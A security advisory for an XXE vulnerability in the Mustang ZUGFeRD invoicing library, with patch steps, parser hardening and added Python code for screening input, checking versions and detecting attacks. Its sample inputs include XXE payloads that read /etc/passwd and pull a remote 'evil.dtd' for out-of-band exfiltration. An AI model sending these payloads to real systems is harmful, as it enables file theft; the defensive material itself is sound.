CVE-2025-66372
📋 TL;DR
CVE-2025-66372 is an XML External Entity (XXE) vulnerability in Mustang library versions before 2.16.3 that allows attackers to exfiltrate files from affected systems. This affects applications using Mustang for XML processing, particularly in ZUGFeRD electronic invoicing implementations. The vulnerability requires attacker-controlled XML input to be processed by the vulnerable library.
💻 Affected Systems
- Mustang (ZUGFeRD library)
⚠️ Manual Verification Required
The NVD entry for this CVE carries no machine-readable version range, so automatic vulnerability detection cannot determine from inventory data alone whether your system is affected.
Why? The database entry does not specify which versions are vulnerable (no version ranges provided by the vendor/NVD). The vendor release notes linked below identify core-2.16.3 as the fixed release, so treat any earlier Mustang version as potentially affected and verify manually:
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Attackers could exfiltrate sensitive files including configuration files, credentials, or application data, potentially leading to data breaches or further system compromise.
Likely Case
Limited file exfiltration from the application's accessible file system, potentially exposing configuration or temporary files.
If Mitigated
No impact if XML parsing is properly configured to disable external entity resolution or if input validation blocks malicious XML.
🎯 Exploit Status
Exploitation requires the application to process attacker-controlled XML input. No public exploit code is currently available.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.16.3
Vendor Advisory: https://github.com/ZUGFeRD/mustangproject/releases/tag/core-2.16.3
Restart Required: Yes
Instructions:
1. Update the Mustang dependency to version 2.16.3 or later.
2. Update pom.xml or build.gradle to reference the fixed version.
3. Rebuild and redeploy the application.
4. Restart the application server.
🔧 Temporary Workarounds
Disable XXE in XML parser
Configure any XML parser your own code creates to refuse DOCTYPE declarations and external entity resolution before it processes untrusted XML. This hardens only the parsers your application constructs; it does not reconfigure the parser inside Mustang, so treat it as defense in depth alongside the upgrade, not as a replacement for it.
Java (JAXP DocumentBuilderFactory):
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // reject any DOCTYPE outright
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);
Input validation and sanitization
Validate and sanitize XML input before it is handed to the library, rejecting anything suspicious:
- Validate against the expected XML schema
- Allowlist the XML elements you accept
- Reject XML containing a DOCTYPE declaration, since entity declarations can only appear inside one and legitimate invoice XML does not need a DTD
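The DOCTYPE-rejection workaround, as an added example that is not code from the page or from the Mustang project: a pre-screen that refuses untrusted XML carrying a DOCTYPE before the bytes reach any parser. Because it inspects the raw bytes it works regardless of how the library's own parser is configured, and it handles the UTF-16 case that a byte-level ASCII search for `<!DOCTYPE` would miss. The invoice and XXE snippets are constructed sample input.

```python
"""Added example, not code from the page or from the Mustang project: a
pre-screen that refuses untrusted XML carrying a DOCTYPE before the bytes
reach any XML parser. Because it inspects the raw bytes, it works no matter
how the library's own parser is configured. The invoice and XXE snippets
below are constructed sample input."""
import re
from typing import Tuple

# An XML document may arrive as UTF-16, where "<!DOCTYPE" is not a
# contiguous ASCII byte string, so decode before searching. BOM first ...
_BOMS = (
    (b"\xef\xbb\xbf", "utf-8"),
    (b"\xff\xfe", "utf-16-le"),
    (b"\xfe\xff", "utf-16-be"),
)
# ... then the byte pattern of "<?" when no BOM is present.
_NO_BOM_HINTS = (
    (b"<\x00?\x00", "utf-16-le"),
    (b"\x00<\x00?", "utf-16-be"),
)

# XML keywords are case-sensitive, but matching case-insensitively costs
# nothing and covers parsers that are lax about it.
_DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
_ENTITY_RE = re.compile(r"<!ENTITY\b", re.IGNORECASE)


def decode_xml(raw: bytes) -> str:
    """Decode by BOM, then by the '<?' byte pattern, else assume UTF-8."""
    for bom, enc in _BOMS:
        if raw.startswith(bom):
            return raw[len(bom):].decode(enc)
    for hint, enc in _NO_BOM_HINTS:
        if raw.startswith(hint):
            return raw.decode(enc)
    return raw.decode("utf-8")


def screen_xml(raw: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Rejects undecodable input, NUL bytes
    (encoding confusion), DOCTYPE and entity declarations. A DOCTYPE that
    only appears inside an XML comment is rejected too: a false positive
    is acceptable for a reject-first screen on invoice data."""
    try:
        text = decode_xml(raw)
    except UnicodeDecodeError as exc:
        return False, f"undecodable input: {exc.reason}"
    if "\x00" in text:
        return False, "NUL byte in document"
    if _DOCTYPE_RE.search(text):
        return False, "DOCTYPE declaration present"
    if _ENTITY_RE.search(text):
        return False, "entity declaration present"
    return True, "ok"


# Constructed sample inputs (not real invoices).
BENIGN = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<rsm:CrossIndustryInvoice xmlns:rsm="urn:un:unece:uncefact:data:standard:CrossIndustryInvoice:100">\n'
    b'  <rsm:ExchangedDocument/>\n'
    b'</rsm:CrossIndustryInvoice>\n'
)
XXE_UTF8 = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
    b'<x>&xxe;</x>\n'
)
# Same payload re-encoded: with a BOM, and as bare UTF-16-LE without one.
XXE_UTF16_BOM = XXE_UTF8.decode("ascii").encode("utf-16")
XXE_UTF16_NOBOM = XXE_UTF8.decode("ascii").encode("utf-16-le")

if __name__ == "__main__":
    for name, doc in [("benign", BENIGN), ("xxe utf-8", XXE_UTF8),
                      ("xxe utf-16 bom", XXE_UTF16_BOM),
                      ("xxe utf-16 no bom", XXE_UTF16_NOBOM)]:
        print(name, screen_xml(doc))
```

Run this in front of whatever code path hands invoice XML to Mustang and drop anything for which `screen_xml` returns `False`; the reason string is suitable for the application log.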
🧯 If You Can't Patch
- Implement network segmentation so that systems running vulnerable Mustang versions can only reach what they need; egress filtering in particular limits out-of-band exfiltration through external entity URLs
- Deploy web application firewall (WAF) rules to block XML containing DOCTYPE or external entity declarations; note that a WAF only inspects XML submitted directly over HTTP, not invoice XML embedded in a ZUGFeRD PDF or arriving through other channels
🔍 How to Verify
Check if Vulnerable:
Check if your application uses Mustang library version below 2.16.3. Review dependency files (pom.xml, build.gradle) or check deployed JAR files.
Check Version:
mvn dependency:tree | grep mustang
gradle dependencies | grep mustang
or inspect MANIFEST.MF in the deployed Mustang JAR files
Verify Fix Applied:
Confirm Mustang version is 2.16.3 or higher in dependencies. Test XML processing with malicious XXE payloads to ensure they are blocked.
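The version check described above, as an added example (not the page's verification script and not code from the Mustang project): it parses `mvn dependency:tree` or `gradle dependencies` output for Mustang artifacts and compares each effective version numerically against 2.16.3, which matters because a plain string comparison would rank 2.9.0 above 2.16.3. It assumes Mustang is published under the Maven groupId org.mustangproject with artifacts such as `library` and `validator`; the sample tree text is constructed.

```python
"""Added example, not code from the Mustang project or the page's own
scripts: parse `mvn dependency:tree` / `gradle dependencies` output for
Mustang artifacts and compare each version numerically against the fixed
release. Assumptions: Mustang is published under the Maven groupId
org.mustangproject (artifacts such as `library`, `validator`); the sample
tree text is constructed for the demo."""
import re
from typing import List, Tuple

FIXED_VERSION = (2, 16, 3)   # first release that carries the fix

# Matches Maven (group:artifact:type[:classifier]:version:scope) and
# Gradle (group:artifact:version) coordinate formats.
_DEP_RE = re.compile(
    r"org\.mustangproject:(?P<artifact>[A-Za-z0-9_.-]+)"
    r"(?::(?:jar|pom|war|bundle)(?::[A-Za-z0-9_.-]+)?)?"   # optional type[:classifier]
    r":(?P<version>\d[A-Za-z0-9_.-]*)"
)
# Gradle prints "2.9.0 -> 2.16.3" when conflict resolution upgraded a version;
# the resolved version on the right is the one that ships.
_RESOLVED_RE = re.compile(r"->\s*(\d[A-Za-z0-9_.-]*)")


def parse_version(v: str) -> Tuple[int, ...]:
    """'2.16.2' -> (2, 16, 2). Numeric tuples are required: as plain strings
    '2.9.0' > '2.16.3', which would hide a vulnerable 2.9.x build."""
    nums = []
    for part in v.split("."):
        m = re.match(r"\d+", part)        # '3-SNAPSHOT' -> 3
        nums.append(int(m.group()) if m else 0)
    return tuple(nums)


def find_mustang_deps(tree_output: str) -> List[Tuple[str, str]]:
    """(artifactId, effective version) for each Mustang artifact in the tree."""
    found = []
    for line in tree_output.splitlines():
        m = _DEP_RE.search(line)
        if not m:
            continue
        resolved = _RESOLVED_RE.search(line)
        version = resolved.group(1) if resolved else m.group("version")
        found.append((m.group("artifact"), version))
    return found


def vulnerable_deps(tree_output: str) -> List[Tuple[str, str]]:
    """Mustang artifacts whose effective version is below 2.16.3."""
    return [(a, v) for a, v in find_mustang_deps(tree_output)
            if parse_version(v) < FIXED_VERSION]


# Constructed sample output, mixing Maven and Gradle line styles.
SAMPLE_TREE = """\
[INFO] com.example:invoice-service:jar:1.0.0
[INFO] +- org.mustangproject:library:jar:2.16.2:compile
[INFO] |  \\- org.mustangproject:validator:jar:2.16.2:compile
+--- org.mustangproject:library:2.9.0 -> 2.16.3
"""

if __name__ == "__main__":
    for artifact, version in vulnerable_deps(SAMPLE_TREE):
        print(f"VULNERABLE: org.mustangproject:{artifact} {version} < 2.16.3")
```

Pipe the real build output into `vulnerable_deps` (for example via `sys.stdin.read()`); an empty result means every Mustang artifact in the resolved tree is at 2.16.3 or later. Shaded or fat JARs are not visible in the dependency tree, so the MANIFEST.MF check remains necessary for those.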
📡 Detection & Monitoring
Log Indicators:
- XML parsing errors related to external entities
- Unusual file access patterns from application process
- Large outbound XML responses containing file contents
Network Indicators:
- XML requests containing DOCTYPE declarations with SYSTEM entities
- Outbound connections to unexpected URLs in XML entity references
SIEM Query:
source="application.logs" AND "DOCTYPE" AND "ENTITY" AND ("SYSTEM" OR "PUBLIC")
Requiring DOCTYPE and ENTITY together keeps the search from firing on every log line that merely contains the word SYSTEM; a bare keyword OR over DOCTYPE/SYSTEM/ENTITY is too noisy to alert on.
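The network and log indicators above, turned into detection logic as an added example (not from the page's SIEM and not code from Mustang): it alerts only when a DOCTYPE declares an entity whose SYSTEM or PUBLIC identifier points at a file or network location, labels the likely technique, and shows beside it why keyword-only matching also fires on benign lines. The log lines are constructed sample data (203.0.113.0/24 is a documentation address range).

```python
"""Added example, not from the page's SIEM or from Mustang: a detector that
goes beyond keyword matching. It alerts only when a DOCTYPE declares an
entity whose SYSTEM or PUBLIC identifier points at a file or network
location, and labels the likely technique. The log lines are constructed
sample data (203.0.113.0/24 is a documentation range)."""
import re
from typing import List, Optional, Tuple

_DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY name SYSTEM "uri">, <!ENTITY % name SYSTEM "uri"> (parameter
# entity, the usual shape of blind/out-of-band XXE) or the PUBLIC form,
# which carries a public identifier before the URI.
_EXT_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.-]+)\s+"
    r'(?:SYSTEM\s+|PUBLIC\s+"[^"]*"\s+)"(?P<uri>[^"]+)"',
    re.IGNORECASE,
)


def classify_xml_entry(entry: str) -> Optional[Tuple[str, str]]:
    """Return (label, uri) when the entry looks like XXE, else None."""
    if not _DOCTYPE_RE.search(entry):
        return None        # entity declarations can only live in a DOCTYPE
    m = _EXT_ENTITY_RE.search(entry)
    if not m:
        return ("doctype-without-external-entity", "")
    uri = m.group("uri")
    scheme = uri.partition(":")[0].lower() if ":" in uri else ""
    if scheme in ("", "file"):
        # a relative URI resolves against the document base: still a local read
        label = "xxe-local-file-read"
    elif scheme in ("http", "https", "ftp"):
        label = "xxe-oob-exfil" if m.group("param") else "xxe-network-fetch"
    else:
        label = "xxe-external-entity"
    return (label, uri)


def naive_match(entry: str) -> bool:
    """Keyword-only matching (any of DOCTYPE/SYSTEM/ENTITY plus 'xml'),
    the kind of first-pass SIEM search that also fires on benign lines."""
    return any(k in entry for k in ("DOCTYPE", "SYSTEM", "ENTITY")) and "xml" in entry


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """(1-based line number, label, uri) for each suspicious entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify_xml_entry(line)
        if verdict:
            hits.append((n, verdict[0], verdict[1]))
    return hits


# Constructed application log: one benign upload, one benign line that a
# keyword search trips on, two XXE attempts and one bare DOCTYPE.
SAMPLE_LOG = [
    '2025-12-01T10:02:11Z INFO  InvoiceUpload body=<?xml version="1.0"?><rsm:CrossIndustryInvoice/>',
    '2025-12-01T10:02:19Z WARN  SYSTEM check: xml parser pool exhausted',
    '2025-12-01T10:03:40Z INFO  InvoiceUpload body=<?xml version="1.0"?>'
    '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>',
    '2025-12-01T10:03:41Z INFO  InvoiceUpload body=<?xml version="1.0"?>'
    '<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://203.0.113.7/evil.dtd"> %dtd;]><r/>',
    '2025-12-01T10:04:02Z INFO  InvoiceUpload body=<?xml version="1.0"?><!DOCTYPE r><r/>',
]

if __name__ == "__main__":
    for n, label, uri in scan_log(SAMPLE_LOG):
        print(f"line {n}: {label} {uri}")
    print("keyword-only hits:", [n for n, l in enumerate(SAMPLE_LOG, 1) if naive_match(l)])
```

The `xxe-oob-exfil` label (parameter entity pulling a remote DTD) is the case to page on first: it is the pattern used when file contents are sent out to an attacker host rather than reflected in the response, and it pairs with the outbound-connection indicator above.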